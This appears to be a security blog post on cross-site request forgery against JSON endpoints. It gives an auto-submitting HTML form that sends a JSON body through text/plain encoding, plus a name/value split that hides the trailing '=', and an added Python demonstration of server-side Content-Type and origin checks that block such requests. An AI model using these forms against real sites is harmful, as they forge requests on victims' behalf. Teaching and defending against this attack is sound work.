Sometimes you see a possible Cross-Site Request Forgery (CSRF) attack against a JSON endpoint, where the request body is a JSON blob instead of x-www-form-urlencoded data. An HTML form can still produce such a body: with enctype="text/plain" the browser sends each field as name=value with no percent-encoding, so the whole JSON document can be placed in the field name.
Here is a PoC that sends a JSON CSRF this way.
<html>
  <form action="http://127.0.0.1/json" method="post"
        enctype="text/plain" name="jsoncsrf">
    <input
      name='{"json":{"nested":"obj"},"list":["0","1"]}'
      type='hidden'>
  </form>
  <script>
    document.jsoncsrf.submit()
  </script>
</html>
You can use any JSON, including nested objects, lists, etc.
The previous example produces a body with a trailing equal sign (=), because text/plain encoding appends "=" and the (empty) value after the field name; that trailing character makes strict parsers reject the document. You can get around it by splitting the JSON across the name and the value so the "=" lands inside a string:
<input name='{"json":"data","extra' value='":"stuff"}'
       type='hidden'>
This gives the following body, which is valid JSON:
{"json":"data","extra=":"stuff"}
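The following is an added example, not code from the original post. It reproduces the text/plain form encoding the browser performs for the two PoCs above (so you can see exactly what arrives at the server, trailing "=" included) and then shows the server-side check that defeats this class of request: a cross-origin HTML form can only send the three form enctypes, never Content-Type: application/json, so an endpoint that insists on that media type (and, as a second line of defence, checks Sec-Fetch-Site and Origin) is not reachable from a form. The endpoint path, the allowed origin and the request bodies are constructed values.

```python
"""Added example: simulate the text/plain form body the browser builds for the
PoCs above and show the header check a JSON endpoint should apply before
parsing. All values are constructed; nothing touches the network."""
import json

# Assumption: the application's own origin (the PoC targets 127.0.0.1).
ALLOWED_ORIGIN = "http://127.0.0.1"


def text_plain_form_body(fields):
    """Encode (name, value) pairs the way a browser does for enctype="text/plain":
    each pair becomes 'name=value' followed by CRLF, with no percent-encoding."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def lenient_parse(body):
    """A parser that accepts whatever arrives. Returns the object, or None if the
    body is not valid JSON (this is where the trailing '=' bites)."""
    try:
        return json.loads(body)
    except ValueError:
        return None


def check_json_request(headers):
    """Return (0, 'ok') if the request may be parsed as JSON, else (status, reason).

    A form can only send text/plain, multipart/form-data or
    application/x-www-form-urlencoded, so requiring application/json already
    blocks form-based CSRF. Sec-Fetch-Site (sent by modern browsers) and Origin
    are checked as well, in case a client other than a form is in play."""
    h = {k.lower(): v for k, v in headers.items()}
    media_type = h.get("content-type", "").split(";", 1)[0].strip().lower()
    if media_type != "application/json":
        return 415, f"unexpected content type {media_type or '<none>'}"
    site = h.get("sec-fetch-site")
    if site is not None and site not in ("same-origin", "none"):
        return 403, f"cross-site request ({site})"
    origin = h.get("origin")
    if origin is not None and origin != ALLOWED_ORIGIN:
        return 403, f"foreign origin {origin}"
    return 0, "ok"


def handle(headers, body):
    """Strict endpoint: validate the headers first, parse the body only afterwards.
    Returns (status, payload)."""
    status, reason = check_json_request(headers)
    if status:
        return status, {"error": reason}
    data = lenient_parse(body)
    if data is None:
        return 400, {"error": "invalid json"}
    return 200, data


# The two PoC forms from the post, as (name, value) pairs.
POC_SIMPLE = [('{"json":{"nested":"obj"},"list":["0","1"]}', "")]
POC_TRICK = [('{"json":"data","extra', '":"stuff"}')]

if __name__ == "__main__":
    for label, fields in (("simple", POC_SIMPLE), ("trick", POC_TRICK)):
        body = text_plain_form_body(fields)
        print(f"{label}: body={body!r}")
        print(f"  lenient parser -> {lenient_parse(body)!r}")
        print(f"  strict endpoint -> {handle({'Content-Type': 'text/plain'}, body)}")
    print("legit:", handle({"Content-Type": "application/json",
                            "Origin": ALLOWED_ORIGIN,
                            "Sec-Fetch-Site": "same-origin"}, '{"json":"data"}'))
```

Run it as a script and the first PoC fails even the lenient parser (the body ends in "=\r\n"), the second parses to {"json": "data", "extra=": "stuff"} exactly as the post describes, and both are refused with 415 by the strict endpoint before any parsing happens. The Content-Type check is the one that matters for forms; treat the Sec-Fetch-Site and Origin checks as defence in depth, and use an anti-CSRF token or SameSite cookies where the endpoint must also accept non-JSON clients.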